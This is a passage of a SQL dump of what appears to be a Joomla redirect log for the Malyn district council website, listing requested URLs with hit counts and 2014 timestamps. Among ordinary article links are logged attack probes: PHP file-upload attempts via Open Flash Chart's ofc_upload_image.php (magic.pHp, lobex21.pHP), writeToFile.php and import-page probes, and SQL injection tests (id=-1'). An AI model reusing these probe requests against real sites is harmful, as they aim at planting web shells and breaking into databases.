00:00:00',301),(8637,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1049:2013-07-15-05-50-46&lang=ru&option=com_content&view=article','','','',5,0,'2014-10-16 19:53:00','0000-00-00 00:00:00',301),(8638,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1023:-------l---28r-&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-16 19:53:02','0000-00-00 00:00:00',301),(8639,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1317:2014-05-25-18-25-09&lang=ru&option=com_content&view=article','','','',5,0,'2014-10-16 20:11:21','0000-00-00 00:00:00',301),(8640,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=896:2013-01-17-07-42-35&Itemid=86&lang=uk&option=com_content&view=article','','','',7,0,'2014-10-16 20:18:44','0000-00-00 00:00:00',301),(8641,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1357:22-&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2014-10-16 20:53:53','0000-00-00 00:00:00',301),(8642,'http://www.malyn-rayrada.org.ua/mjhl/components/com_community/index.html','','','',4,0,'2014-10-16 21:27:17','0000-00-00 00:00:00',301),(8643,'http://www.malyn-rayrada.org.ua/mjhl/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',4,0,'2014-10-16 21:27:23','0000-00-00 00:00:00',301),(8644,'http://www.malyn-rayrada.org.ua/majma/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',4,0,'2014-10-16 21:30:44','0000-00-00 00:00:00',301),(8645,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1025:-2011-2015-&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-16 21:45:46','0000-00-00 00:00:00',301),(8646,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=914:2013-01-23-13-21-28&catid=47&Itemid=86&lang=en','','','',2,0,'2014-10-16 21:45:56','0000-00-00 00:00:00',301),(8647,'http://www.malyn-rayrada.org.ua/portal/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',2,0,'2014-10-16 21:51:27','0000-00-00 00:00:00',301),(8648,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=914:2013-01-23-13-21-28&catid=47:-21022013-&Itemid=86&lang=en','','','',2,0,'2014-10-16 22:22:54','0000-00-00 00:00:00',301),(8649,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=911:2013-01-22-13-27-41&Itemid=14&lang=en&option=com_content&view=article','','','',3,0,'2014-10-16 23:22:54','0000-00-00 00:00:00',301),(8650,'http://www.malyn-rayrada.org.ua/index.php?catid=57:--15042014-&id=1277:-2014-&Itemid=98&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-16 23:42:32','0000-00-00 00:00:00',301),(8651,'http://www.malyn-rayrada.org.ua/index.php?catid=55&id=1167:--------l-r-------&Itemid=96&lang=en&option=com_content&view=article','','','',2,0,'2014-10-16 23:46:29','0000-00-00 00:00:00',301),(8652,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1247:2014-03-20-14-37-15&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-16 23:46:32','0000-00-00 00:00:00',301),(8653,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1209:-----2014-&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-16 23:46:35','0000-00-00 00:00:00',301),(8654,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1202:2014-01-31-07-45-54&Itemid=70&lang=en&option=com_content&view=article','','','',4,0,'2014-10-16 23:46:38','0000-00-00 00:00:00',301),(8655,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=844:-2013-&Itemid=85&lang=en&option=com_content&view=article','','','',1,0,'2014-10-16 23:46:41','0000-00-00 00:00:00',301),(8656,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=926:2013-02-21-09-02-30&Itemid=86&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-16 23:46:50','0000-00-00 00:00:00',301),(8657,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=2&Itemid=0&lang=ru','','','',15,0,'2014-10-16 23:48:24','0000-00-00 00:00:00',301),(8658,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54:--29112013-&id=1143:2013-11-26-13-23-37&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-17 00:34:37','0000-00-00 00:00:00',301),(8659,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=895:-2013-2017-&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-17 00:51:58','0000-00-00 00:00:00',301),(8660,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=942:-19-6-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-17 00:52:04','0000-00-00 00:00:00',301),(8661,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1131:9-------&lang=uk&option=com_content&view=article','','','',6,0,'2014-10-17 01:54:03','0000-00-00 00:00:00',301),(8662,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=949:2013-03-06-12-51-36&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-17 01:54:05','0000-00-00 00:00:00',301),(8663,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1288:2014-04-23-06-50-40&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-17 01:54:07','0000-00-00 00:00:00',301),(8664,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1198:2014-01-31-07-37-58&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-17 02:08:31','0000-00-00 00:00:00',301),(8665,'http://malyn-rayrada.org.ua/community/components/com_community/index.html','','','',1,0,'2014-10-17 02:28:23','0000-00-00 00:00:00',301),(8666,'http://malyn-rayrada.org.ua/community/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-10-17 02:28:31','0000-00-00 00:00:00',301),(8667,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-10-17 03:17:25','0000-00-00 00:00:00',301),(8668,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1242:-25-2011-74-19-2011-193-&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-17 03:28:32','0000-00-00 00:00:00',301),(8669,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=960:-19-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-17 03:42:30','0000-00-00 00:00:00',301),(8670,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=971:-2012-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-17 03:42:36','0000-00-00 00:00:00',301),(8671,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=965:2013-03-14-10-56-03&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-17 03:59:38','0000-00-00 00:00:00',301),(8672,'http://malyn-rayrada.org.ua/index.php/malinshchina-ta-malinchani?page=2','','','',1,0,'2014-10-17 04:06:36','0000-00-00 00:00:00',301),(8673,'http://www.malyn-rayrada.org.ua//administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lobex21.pHP','','','',3,0,'2014-10-17 04:35:31','0000-00-00 00:00:00',301),(8674,'http://www.malyn-rayrada.org.ua//administrator/components/com_maianmedia/utilities/charts/tmp-upload-images/lobex21.pHP?rf','','','',3,0,'2014-10-17 04:35:45','0000-00-00 00:00:00',301),(8675,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=981:2013-04-03-07-23-01&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-17 05:03:12','0000-00-00 00:00:00',301),(8676,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1016:2013-06-03-11-41-36&lang=en&option=com_content&view=article','','','',3,0,'2014-10-17 05:03:20','0000-00-00 00:00:00',301),(8677,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=979:2013-03-29-09-18-27&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-17 05:17:27','0000-00-00 00:00:00',301),(8678,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1088:2013-09-19-12-06-07&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-17 06:51:44','0000-00-00 00:00:00',301),(8679,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1013:2013-06-01-03-58-38&lang=uk&option=com_content&view=article','','','',7,0,'2014-10-17 06:51:46','0000-00-00 00:00:00',301),(8680,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1024:-l-2011-2014-r-&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-17 06:51:48','0000-00-00 00:00:00',301),(8681,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=975:-2012-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-17 07:07:03','0000-00-00 00:00:00',301),(8682,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=980:2013-03-31-08-20-42&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-17 07:07:05','0000-00-00 00:00:00',301),(8683,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-10-17 07:26:05','0000-00-00 00:00:00',301),(8684,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1290:2014-04-23-06-56-41&catid=10&Itemid=17&lang=en','','','',1,0,'2014-10-17 08:12:08','0000-00-00 00:00:00',301),(8685,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&catid=11:2010-06-05-14-33-33&amp','','','',1,0,'2014-10-17 08:12:23','0000-00-00 00:00:00',301),(8686,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=940:2013-02-21-14-02-14&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-17 08:25:21','0000-00-00 00:00:00',301),(8687,'http://www.malyn-rayrada.org.ua/index.php?option=-1\'&view=article&id=327:2011-05-20-16-20-26&catid=33&Itemid=66&lang=uk','','','',1,0,'2014-10-17 08:35:40','0000-00-00 00:00:00',301),(8688,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=-1\'&catid=33&Itemid=66&lang=uk','','','',1,0,'2014-10-17 08:35:49','0000-00-00 00:00:00',301),(8689,'http://www.malyn-rayrada.org.ua/index.php/component/content/','','','',1,0,'2014-10-17 08:38:08','0000-00-00 00:00:00',301),(8690,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1252:2014-03-24-17-19-07&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-17 08:40:40','0000-00-00 00:00:00',301),(8691,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1016:2013-06-03-11-41-36&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-17 08:40:47','0000-00-00 00:00:00',301),(8692,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1314:2014-05-14-11-53-26&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-17 09:46:31','0000-00-00 00:00:00',301),(8693,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1074:2013-09-02-05-02-30&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-17 09:59:48','0000-00-00 00:00:00',301),(8694,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1050:2013-07-15-13-52-21&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-17 10:00:04','0000-00-00 00:00:00',301),(8695,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=937:---------------------------21122012--l--&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-17 10:15:09','0000-00-00 00:00:00',301),(8696,'http://www.malyn-rayrada.org.ua/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.pHp','','','',41,0,'2014-10-17 10:30:45','0000-00-00 00:00:00',301),(8697,'http://www.malyn-rayrada.org.ua/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.pHp.pHp','','','',41,0,'2014-10-17 10:30:53','0000-00-00 00:00:00',301),(8698,'http://www.malyn-rayrada.org.ua/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.pHp','','','',41,0,'2014-10-17 10:30:59','0000-00-00 00:00:00',301),(8699,'http://www.malyn-rayrada.org.ua/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.pHp','','','',38,0,'2014-10-17 10:31:15','0000-00-00 00:00:00',301),(8700,'http://www.malyn-rayrada.org.ua/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.pHp.pHp','','','',41,0,'2014-10-17 10:31:15','0000-00-00 00:00:00',301),(8701,'http://www.malyn-rayrada.org.ua/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.pHp.pHp','','','',38,0,'2014-10-17 10:31:21','0000-00-00 00:00:00',301),(8702,'http://www.malyn-rayrada.org.ua/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.pHp','','','',41,0,'2014-10-17 10:31:29','0000-00-00 00:00:00',301),(8703,'http://www.malyn-rayrada.org.ua/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.pHp','','','',39,0,'2014-10-17 10:31:44','0000-00-00 00:00:00',301),(8704,'http://www.malyn-rayrada.org.ua/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.pHp.pHp','','','',39,0,'2014-10-17 10:31:51','0000-00-00 00:00:00',301),(8705,'http://www.malyn-rayrada.org.ua/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.pHp','','','',40,0,'2014-10-17 10:31:58','0000-00-00 00:00:00',301),(8706,'http://www.malyn-rayrada.org.ua/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.pHp.pHp','','','',41,0,'2014-10-17 10:31:36','0000-00-00 00:00:00',301),(8707,'http://www.malyn-rayrada.org.ua/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.pHp.pHp','','','',40,0,'2014-10-17 10:32:06','0000-00-00 00:00:00',301),(8708,'http://www.malyn-rayrada.org.ua/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.pHp','','','',38,0,'2014-10-17 10:32:12','0000-00-00 00:00:00',301),(8709,'http://www.malyn-rayrada.org.ua/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.pHp.pHp','','','',38,0,'2014-10-17 10:32:20','0000-00-00 00:00:00',301),(8710,'http://www.malyn-rayrada.org.ua/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.pHp','','','',38,0,'2014-10-17 10:32:42','0000-00-00 00:00:00',301),(8711,'http://www.malyn-rayrada.org.ua/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.pHp','','','',42,0,'2014-10-17 10:32:28','0000-00-00 00:00:00',301),(8712,'http://www.malyn-rayrada.org.ua/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.pHp.pHp','','','',42,0,'2014-10-17 10:32:34','0000-00-00 00:00:00',301),(8713,'http://www.malyn-rayrada.org.ua/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.pHp.pHp','','','',38,0,'2014-10-17 10:32:49','0000-00-00 00:00:00',301),(8714,'http://www.malyn-rayrada.org.ua/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.pHp','','','',39,0,'2014-10-17 10:32:57','0000-00-00 00:00:00',301),(8715,'http://www.malyn-rayrada.org.ua/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.pHp.pHp','','','',39,0,'2014-10-17 10:33:04','0000-00-00 00:00:00',301),(8716,'http://www.malyn-rayrada.org.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.pHp.pHp','','','',40,0,'2014-10-17 10:33:23','0000-00-00 00:00:00',301),(8717,'http://www.malyn-rayrada.org.ua/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.pHp','','','',39,0,'2014-10-17 10:33:27','0000-00-00 00:00:00',301),(8718,'http://www.malyn-rayrada.org.ua/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.pHp.pHp','','','',38,0,'2014-10-17 10:33:32','0000-00-00 00:00:00',301),(8719,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1019:2013-06-06-11-26-38&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-17 11:20:59','0000-00-00 00:00:00',301),(8720,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1228:2014-02-27-14-42-41&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-17 11:33:33','0000-00-00 00:00:00',301),(8721,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1363:--qq&lang=en&option=com_content&view=article','','','',1,0,'2014-10-17 11:33:39','0000-00-00 00:00:00',301),(8722,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1287:2014-04-23-06-49-34&catid=10&Itemid=17&lang=ru','','','',5,0,'2014-10-17 11:46:47','0000-00-00 00:00:00',301),(8723,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1129:2013-11-06-13-36-25&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-17 11:47:47','0000-00-00 00:00:00',301),(8724,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1216:-q-q&lang=en&option=com_content&view=article','','','',1,0,'2014-10-17 11:47:56','0000-00-00 00:00:00',301),(8725,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=3&Itemid=1&lang=en','','','',6,0,'2014-10-17 12:55:19','0000-00-00 00:00:00',301),(8726,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-10-17 15:48:13','0000-00-00 00:00:00',301),(8727,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1060:2013-07-27-10-13-15&catid=11&lang=en&Itemid=','','','',1,0,'2014-10-17 15:52:59','0000-00-00 00:00:00',301),(8728,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1088:2013-09-19-12-06-07&catid=36&Itemid=70&lang=en','','','',1,0,'2014-10-17 22:25:17','0000-00-00 00:00:00',301),(8729,'http://malyn-rayrada.org.ua/galeri/components/com_community/index.html','','','',1,0,'2014-10-18 02:14:49','0000-00-00 00:00:00',301),(8730,'http://malyn-rayrada.org.ua/galeri/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-10-18 02:14:57','0000-00-00 00:00:00',301),(8731,'http://malyn-rayrada.org.ua/galeri/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-10-18 02:15:07','0000-00-00 00:00:00',301),(8732,'http://malyn-rayrada.org.ua/galeri/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-10-18 02:15:17','0000-00-00 00:00:00',301),(8733,'http://malyn-rayrada.org.ua/attachments/article/26/history','','','',3,0,'2014-10-18 05:14:53','0000-00-00 00:00:00',301),(8734,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1116:-2013-&catid=11&lang=ru','','','',4,0,'2014-10-18 07:29:03','0000-00-00 00:00:00',301),(8735,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1116:-2013-&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-18 07:32:24','0000-00-00 00:00:00',301),(8736,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1346:2014-06-18-11-51-53&catid=11&lang=en','','','',1,0,'2014-10-18 07:46:51','0000-00-00 00:00:00',301),(8737,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1346:2014-06-18-11-51-53&catid=11&lang=ru','','','',1,0,'2014-10-18 07:46:53','0000-00-00 00:00:00',301),(8738,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1347:2014-06-19-11-19-16&catid=11&lang=en','','','',1,0,'2014-10-18 07:46:59','0000-00-00 00:00:00',301),(8739,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1347:2014-06-19-11-19-16&catid=11&lang=en&Itemid=0','','','',1,0,'2014-10-18 07:47:01','0000-00-00 00:00:00',301),(8740,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1347:2014-06-19-11-19-16&catid=11&lang=ru','','','',1,0,'2014-10-18 07:47:04','0000-00-00 00:00:00',301),(8741,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1352:2014-06-26-06-51-20&catid=11&lang=en','','','',1,0,'2014-10-18 07:47:35','0000-00-00 00:00:00',301),(8742,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1352:2014-06-26-06-51-20&catid=11&lang=en&Itemid=0','','','',2,0,'2014-10-18 07:47:37','0000-00-00 00:00:00',301),(8743,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1353:2014-07-01-05-08-54&catid=11&lang=en','','','',1,0,'2014-10-18 07:48:20','0000-00-00 00:00:00',301),(8744,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1353:2014-07-01-05-08-54&catid=11&lang=en&Itemid=0','','','',1,0,'2014-10-18 07:48:22','0000-00-00 00:00:00',301),(8745,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1354:-lr-&catid=11&lang=en&Itemid=0','','','',1,0,'2014-10-18 07:48:31','0000-00-00 00:00:00',301),(8746,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1355:2014-07-02-06-11-04&catid=11&lang=en','','','',1,0,'2014-10-18 07:48:39','0000-00-00 00:00:00',301),(8747,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1355:2014-07-02-06-11-04&catid=11&lang=en&Itemid=0','','','',3,0,'2014-10-18 07:49:23','0000-00-00 00:00:00',301),(8748,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1355:2014-07-02-06-11-04&catid=11&lang=ru','','','',2,0,'2014-10-18 07:49:26','0000-00-00 00:00:00',301),(8749,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1355:2014-07-02-06-11-04&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-18 07:49:28','0000-00-00 00:00:00',301),(8750,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1355:2014-07-02-06-11-04&catid=11&lang=uk&Itemid=0','','','',4,0,'2014-10-18 07:49:31','0000-00-00 00:00:00',301),(8751,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1356:2014-07-03-06-32-02&catid=11&lang=en','','','',1,0,'2014-10-18 07:49:33','0000-00-00 00:00:00',301),(8752,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1356:2014-07-03-06-32-02&catid=11&lang=en&Itemid=0','','','',2,0,'2014-10-18 07:49:35','0000-00-00 00:00:00',301),(8753,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1356:2014-07-03-06-32-02&catid=11&lang=ru','','','',1,0,'2014-10-18 07:49:38','0000-00-00 00:00:00',301),(8754,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1356:2014-07-03-06-32-02&catid=11&lang=ru&Itemid=0','','','',4,0,'2014-10-18 07:49:41','0000-00-00 00:00:00',301),(8755,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1357:22-&catid=11&lang=en','','','',1,0,'2014-10-18 07:49:46','0000-00-00 00:00:00',301),(8756,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1357:22-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-10-18 07:49:48','0000-00-00 00:00:00',301),(8757,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1357:22-&catid=11&lang=ru','','','',1,0,'2014-10-18 07:49:50','0000-00-00 00:00:00',301),(8758,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1357:22-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-18 07:49:53','0000-00-00 00:00:00',301),(8759,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1357:22-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-10-18 07:49:55','0000-00-00 00:00:00',301),(8760,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1358:2014-07-07-08-11-22&catid=11&lang=en','','','',1,0,'2014-10-18 07:49:57','0000-00-00 00:00:00',301),(8761,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1358:2014-07-07-08-11-22&catid=11&lang=en&Itemid=0','','','',1,0,'2014-10-18 07:49:59','0000-00-00 00:00:00',301),(8762,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1358:2014-07-07-08-11-22&catid=11&lang=ru','','','',2,0,'2014-10-18 07:50:01','0000-00-00 00:00:00',301),(8763,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1358:2014-07-07-08-11-22&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-18 07:50:04','0000-00-00 00:00:00',301),(8764,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1358:2014-07-07-08-11-22&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-10-18 07:50:06','0000-00-00 00:00:00',301),(8765,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1359:2014-07-07-08-13-48&catid=11&lang=en','','','',1,0,'2014-10-18 07:50:08','0000-00-00 00:00:00',301),(8766,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1359:2014-07-07-08-13-48&catid=11&lang=ru','','','',2,0,'2014-10-18 07:50:14','0000-00-00 00:00:00',301),(8767,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1359:2014-07-07-08-13-48&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-18 07:50:15','0000-00-00 00:00:00',301),(8768,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1359:2014-07-07-08-13-48&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-18 07:50:17','0000-00-00 00:00:00',301),(8769,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1365:2014-07-10-13-58-58&catid=11&lang=en','','','',2,0,'2014-10-18 07:50:20','0000-00-00 00:00:00',301),(8770,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1365:2014-07-10-13-58-58&catid=11&lang=en&Itemid=0','','','',1,0,'2014-10-18 07:50:22','0000-00-00 00:00:00',301),(8771,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1365:2014-07-10-13-58-58&catid=11&lang=ru','','','',2,0,'2014-10-18 07:50:25','0000-00-00 00:00:00',301),(8772,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1365:2014-07-10-13-58-58&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-18 07:50:27','0000-00-00 00:00:00',301),(8773,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1365:2014-07-10-13-58-58&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-10-18 07:50:29','0000-00-00 00:00:00',301),(8774,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1369:-lr-&catid=11&lang=en','','','',10,0,'2014-10-18 07:50:31','0000-00-00 00:00:00',301),(8775,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1369:-lr-&catid=11&lang=en&Itemid=0','','','',1,0,'2014-10-18 07:50:33','0000-00-00 00:00:00',301),(8776,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1369:-lr-&catid=11&lang=ru','','','',1,0,'2014-10-18 07:50:36','0000-00-00 00:00:00',301),(8777,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1369:-lr-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-18 07:50:38','0000-00-00 00:00:00',301),(8778,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1369:-lr-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-10-18 07:50:40','0000-00-00 00:00:00',301),(8779,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1370:31-&catid=11&lang=en&Itemid=0','','','',1,0,'2014-10-18 07:50:42','0000-00-00 